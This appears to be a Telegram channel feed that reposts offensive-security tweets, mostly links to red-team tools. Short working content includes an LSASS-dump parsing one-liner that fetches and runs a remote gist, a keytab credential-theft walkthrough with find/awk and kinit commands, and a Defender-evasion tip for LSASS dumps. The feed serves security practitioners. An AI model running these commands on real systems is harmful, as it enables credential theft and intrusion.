Offensive Xwitter
~$ socat TWITTER-LISTEN:443,fork,reuseaddr TELEGRAM:1.3.3.7:31337

Disclaimer: https://xn--r1a.website/OffensiveTwitter/546
😈 [ k_sec, Kurt Baumgartner ]

we go deeper yet into OpTriangulation...

🔗 https://securelist.com/triangledb-triangulation-implant/110050/

funny thing, it reminds me of a simple string xor decoder that i wrote for purple lambert research a few years ago.
course, many malware families use the same obfuscation...

#include <stdio.h>
#include <stdlib.h>   /* malloc, free */
#include <string.h>

int main(int argc, const char* argv[]){
    unsigned int i=0;
    unsigned char c1, c2, x1;
    const int s1[] = {0x76, 0x18, 0x6C, 0x08, 0x64, 0x08, 0x00}; //obfuscated string value here, zero-terminated

    int *s2 = malloc(sizeof(s1)); // non-const: memcpy needs a writable destination
    if (s2 == NULL) return 1;
    memcpy(s2,s1,sizeof(s1));

    // simple xor between current and next value; stop when the next value is the terminator
    while (s2[i+1] != '\0') {
        c1 = (unsigned char) s1[i];
        c2 = (unsigned char) s2[i+1];
        x1 = c1 ^ c2;
        printf("%c", x1);
        i++;
    }
    printf("\n");

    free(s2);
    return 0;
}

πŸ₯ [ tweet ]
πŸ‘2😁1
😈 [ pfiatde, pfiatde ]

Command detection in Powershell is not easy.
Some words about an obfuscated LSASS dumper command via comsvcs.
Plus some ways to circumvent deletion of the dump.

🔗 https://badoption.eu/blog/2023/06/21/dumpit.html
🔗 https://github.com/powerseb/PowerExtract

🐥 [ tweet ]
👍1
😈 [ pdnuclei, nuclei ]

If you're not writing custom Nuclei templates, you're missing out! 😒

⚛️ In this blog post, we explore the power of nuclei custom templates and how creating your own is beneficial for users!

Don't miss out, read this 👇

🔗 https://blog.projectdiscovery.io/if-youre-not-writing-custom-nuclei-templates-youre-missing-out/

🐥 [ tweet ]
😈 [ R0h1rr1m, Furkan Göksel ]

I developed a Fileless Lateral Movement tool called NimExec. It changes service configuration to execute the payload via manually crafted RPC packets. It's the improved version of @JulioUrena 's SharpNoPSExec with Pass the Hash support. Enjoy!

#infosec
https://t.co/G6xeyHVmnf

🔗 https://github.com/frkngksl/NimExec

🐥 [ tweet ]
😈 [ BlWasp_, BlackWasp ]

New tool in Rust. To learn this language, and the basics of Windows internals, I have coded a TLS over TCP reverse shell with advanced integrated features like load a PE or a shellcode, download/upload files, bypass the AMSI, or autopwn the world...
https://t.co/DQShWQbeRw

🔗 https://github.com/BlWasp/rs-shell

🐥 [ tweet ]

https://github.com/BlWasp/rs-shell/blob/main/src/autopwn.rs 🗿
😈 [ 0gtweet, Grzegorz Tworek ]

Netsh.exe relies on extensions taken from Registry, which means it may be used as a persistence.
And what, if you go one step further, extending netsh with a DLL allowing you to do whatever you want? Kinda #LOLBin 😎
Enjoy the C code and DLL, as usual: https://t.co/xfm1Mxaf4F

🔗 https://github.com/gtworek/PSBits/tree/master/NetShRun

🐥 [ tweet ]
👍4
A bit of code golf for parsing pypykatz output 🤪

pypykatz lsa minidump lsass.dmp 2>/dev/null | python3 <(wget -qO- https://gist.github.com/snovvcrash/d77a3ea5401498da95e1fab840122bea/raw/554b5621eed33be158c1583a17d50448964cefa8/pypyparse.py) 


🔗 https://gist.github.com/snovvcrash/d77a3ea5401498da95e1fab840122bea
👍4 😁3 🥱1
😈 [ HakaiOffsec, Hakai Offsec ]

After some hard work, coffee has been released! Our newest Rust COFF Loader!
If you want to check it out:
Don’t forget to check our blog post for more details:

🔗 https://github.com/hakaioffsec/coffee
🔗 https://labs.hakaioffsec.com/coffee-a-coff-loader-made-in-rust/

🐥 [ tweet ]
👍1
Forwarded from RedTeam brazzers (Misha)
Stealing KeyTab.

During penetration tests you often come across Linux systems with a configured keytab. A keytab stores pairs of a Kerberos principal and its encrypted keys. With these encrypted keys you can obtain a TGT, which means you can request a TGT in the name of the principal without entering a password. Kerberos on Linux is far from rare these days: heterogeneous networks are becoming more and more popular for a number of reasons. For example, there may be a scenario where a Linux host backs up the contents of some share, while only domain users can access that share. In that case a simple bash script is written that implements the logic of requesting a TGT based on the keytab and then copying the files from the share. And to run it periodically, the script is added to crontab.

For us as attackers, the process of requesting a TGT based on the keytab is of course what's interesting. The kinit command can be used for this with the following syntax:
kinit -kt <keytab> <principal>

For example, if the file /tmp/admin.keytab is used to authenticate the user admin@OFFICE.LOCAL, then we do this:
kinit -kt /tmp/admin.keytab admin@OFFICE.LOCAL

Only one problem remains: finding the keytab files themselves. Of course, you can search for these files by hand with find and then just as tediously check the permissions on them, which is not great. So I scribbled the following one-liner, which automatically finds all .keytab files and then highlights the interesting ones in different colours:
1. Green: files owned by the current user.
2. Yellow: files owned by a user other than the current one, where the current user does not have sufficient rights (read/write) on that keytab.
3. Finally, red: files owned by a user other than the current one, where the current user does have sufficient rights on that keytab.

find / -iname '*.keytab' -type f -exec ls -l {} \; 2>/dev/null | awk -v user="$(whoami)" 'BEGIN { FS = OFS = " "; red = "\033[31m"; yellow = "\033[33m"; green = "\033[32m"; reset = "\033[0m" } { if ($3 == user && $9 ~ /.keytab$/) { printf green } else if ($3 != user && $9 ~ /.keytab$/ && $1 ~ /^-.w.r../) { printf red } else if ($3 != user && $9 ~ /.keytab$/ && ($1 !~ /^.w.r../ || $1 !~ /^-.w../)) { printf yellow } print $0; printf reset }'
🔥5 👍1
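As an added example, not the forwarded post's code: the same three-way classification in Python using stat() and access(2) instead of regexes over `ls -l` output, with an extra flag for keytabs readable by group or other, which is the condition a defender would remediate (0600 on the owning account). It treats read access as sufficient, since that is all kinit needs.

```python
import os
import stat
from dataclasses import dataclass
from pathlib import Path

@dataclass
class KeytabFinding:
    path: str
    owner_uid: int
    mode: int          # permission bits only, e.g. 0o600
    category: str      # "owned" (green) | "accessible" (red) | "not_accessible" (yellow)
    overshared: bool   # group/other can read or write: the thing to remediate

def is_overshared(mode: int) -> bool:
    """A keytab is a long-lived credential: anything beyond owner rw (0600)
    lets other local accounts request tickets as that principal."""
    return bool(mode & (stat.S_IRGRP | stat.S_IWGRP | stat.S_IROTH | stat.S_IWOTH))

def classify(path: Path) -> KeytabFinding:
    """stat() for ownership and access(2) for effective readability (all kinit
    needs), so supplementary groups and POSIX ACLs count, unlike `ls -l` regexes."""
    st = path.stat()
    mode = stat.S_IMODE(st.st_mode)
    if st.st_uid == os.getuid():
        category = "owned"
    elif os.access(path, os.R_OK):
        category = "accessible"
    else:
        category = "not_accessible"
    return KeytabFinding(str(path), st.st_uid, mode, category, is_overshared(mode))

def find_keytabs(roots: list[Path]) -> list[KeytabFinding]:
    """Like `find / -iname '*.keytab' -type f 2>/dev/null`; os.walk already skips dirs it cannot enter."""
    findings = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                p = Path(dirpath) / name
                try:
                    if name.lower().endswith(".keytab") and p.is_file() and not p.is_symlink():
                        findings.append(classify(p))
                except OSError:
                    continue        # vanished or not stat-able: skip, like 2>/dev/null
    return findings

if __name__ == "__main__":
    for f in find_keytabs([Path("/")]):
        print(f.category, f"{f.mode:04o}", f.path, "OVERSHARED" if f.overshared else "")
```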
😈 [ stephenfewer, Stephen Fewer ]

Last Friday's @metasploit release adds coverage for CVE-2023-34362 in MOVEit Transfer, great work by @tychos_moose, @iagox86, @_CField and team. Nice to see the new fetch payloads in action too 🔥 Check out the release here:

🔗 https://www.rapid7.com/blog/post/2023/06/23/metasploit-weekly-wrap-up-16/

🐥 [ tweet ]
😁2 🔥1
😈 [ mpgn_x64, mpgn ]

3, 2, 1 CrackMapExec 6.0.0 is now public! 🎉

So many new features and fixes that I've made a blog post for it ▶️

Special thanks to @_zblurx @MJHallenbeck & @al3x_n3ff for their indefectible support & contributions! 🍻

🔗 https://wiki.porchetta.industries/news/a-new-home

🐥 [ tweet ]
👍2 🔥2
😈 [ _zblurx, Thomas Seigneuret ]

Want to bypass Windows Defender when dumping LSASS? Just dump into .log files 😅

🐥 [ tweet ]
🔥4 😁2 👍1 😒1
😈 [ kleiton0x7e, Kleiton Kurti ]

Came up with an improved version of WMIExec. By leveraging the Win32_ScheduledJob class, we can remotely create scheduled jobs. This way it's not required anymore to rely on port 139 and 445.

Github:

#CyberSecurity #redteam #infosec #infosecurity

🔗 https://github.com/WKL-Sec/wmiexec/

🐥 [ tweet ]
🔥3
😈 [ passthehashbrwn, Josh ]

Just published a new blog post covering how to hide Beacon during BOF execution. If your BOF triggers a memory scan then EDR is likely to find Beacon and kill your process, but we can mask it using a simple technique.

🔗 https://securityintelligence.com/posts/how-to-hide-beacon-during-bof-execution/
🔗 https://github.com/xforcered/bofmask

🐥 [ tweet ]
🔥3
😈 [ an0n_r0, an0n ]

Just recreated this awesome @SpecterOps (@zyn3rgy, @0xthirteen) technique for initial access by #backdooring a random #ClickOnce application with a Cobalt Strike stager. While I became a ClickOnce addict 🙃, compiled a short writeup about my journey:

🔗 https://an0n-r0.medium.com/backdooring-clickonce-net-for-initial-access-a-practical-example-1eb6863c0579

🐥 [ tweet ][ quote ]
👍7
Forwarded from Волосатый бублик
4 new videos on the SpecterOps channel

Security Distilled: Building a First-Principles Approach to Security
https://www.youtube.com/watch?v=zjJaYwqVHxY

A Taste of Kerberos Abuse
https://www.youtube.com/watch?v=9SUXifUp9ZY

The BloodHound 4.3 Release: Get Global Admin More Often
https://www.youtube.com/watch?v=H1q-CBHbmHE

Red + Blue, How Purple Are You? Identifying Gaps in The Spectrum of Security
https://www.youtube.com/watch?v=B_2AfoT2WxU
πŸ‘3πŸ”₯1
😈 [ ricnar456, Ricardo Narvaja ]

As promised, the research on CVE-2023-28252 is already published with its PoC and the detailed explanation of the reversing that we did with my friend @solidclt.

πŸ”— https://www.coresecurity.com/core-labs/articles/understanding-cve-2022-37969-windows-clfs-lpe
πŸ”— https://github.com/fortra/CVE-2023-28252

πŸ₯ [ tweet ]
πŸ”₯6
Scrolled Twitter all the way to the rate limit, so instead of posts about pentests, here's this
😒8 👍3 🔥2
😈 [ VirtualAllocEx, Daniel Feichter ]

Although the Hell's Gate POC is a few years old, I was interested in understanding it in more detail.
So I wrote the new blog post "Exploring Hell's Gate" - an in-depth look at Hell's Gate.

🔗 https://redops.at/en/blog/exploring-hells-gate

🐥 [ tweet ]
👍1
😈 [ _RastaMouse, Rasta Mouse ]

[BLOG]
Short post showing how C# Source Generators could be used to build customisable implants.

🔗 https://rastamouse.me/csharp-source-generators/

🐥 [ tweet ]
👍1
😈 [ D1rkMtr, D1rkMtr ]

A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes. It utilizes a low-level keyboard input hook, allowing it to record keystrokes in certain contexts (like in mstsc.exe and CredentialUIBroker.exe).

🔗 https://github.com/TheD1rkMtr/TakeMyRDP

🐥 [ tweet ]
👍4